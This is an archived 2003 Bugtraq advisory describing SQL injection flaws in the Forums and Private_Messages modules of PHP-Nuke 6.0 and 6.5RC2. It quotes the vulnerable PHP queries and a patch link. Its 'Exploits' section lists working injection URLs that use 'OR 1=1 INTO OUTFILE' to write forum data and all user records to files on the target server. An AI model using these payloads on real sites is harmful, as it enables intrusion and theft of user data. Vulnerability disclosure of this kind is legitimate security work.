lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <F108xxnSYe4nhrKtzcb00031b46@hotmail.com>
Date: Mon, 10 Mar 2003 22:48:22 +0100
From: "Frog Man" <leseulfrog@...mail.com>
To: fpc@...nmax.com, bugtraq@...urityfocus.com, vulnwatch@...nwatch.org
Subject: PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again




Informations :
°°°°°°°°°°°°°°
Language : PHP
Website : http://www.phpnuke.org
Version : 6.0 & 6.5 RC2
Modules : Forums, Private_Messages
Problem : SQL Injection


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/modules/Forums/viewtopic.php :

------------------------------------------------------------------------
$sql = "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access, 
forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = 
'$forum'";
------------------------------------------------------------------------

/modules/Forums/viewforum.php :

------------------------------------------------------------------------
$sql = "SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name, 
u.uname, u.uid,m.forum_id,m.user_id FROM
${prefix}_forums f, ".$user_prefix."_users u, ${prefix}_forum_mods m
WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id = 
u.uid";
------------------------------------------------------------------------

/modules/Forums/reply.php :
------------------------------------------------------------------------
$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM 
${prefix}_forums WHERE (forum_id = '$forum')";
------------------------------------------------------------------------

/modules/Forums/newtopic.php :
------------------------------------------------------------------------
$sql = "SELECT forum_type, forum_pass, forum_name, forum_access, 
forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = 
'$forum')";
------------------------------------------------------------------------


/modules/Forums/editpost.php :
------------------------------------------------------------------------$sql 
= "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM 
${prefix}_forums WHERE forum_id = '$forum'";
------------------------------------------------------------------------

/modules/Private_Messages/reply.php :
------------------------------------------------------------------------
if ($reply || $send) {

    if ($uname != "") {
	$res = sql_num_rows(sql_query("select * from ".$user_prefix."_users where 
uname='$uname'", $dbi), $dbi);
------------------------------------------------------------------------



Exploits :
°°°°°°°°°°
- This will save forums informations into a txt file :
http://[target]/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
http://[target]/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=reply&forum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=newtopic&forum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/*

http://[target]/modules.php?op=modload&name=Forums&file=editpost&forum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt

etc...



- This will save all users informations into a txt file :

http://[target]/modules.php?name=Private_Messages&file=reply&send=1&uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt



Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info




More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt


frog-m@n








_________________________________________________________________
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/hotmailparsms



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ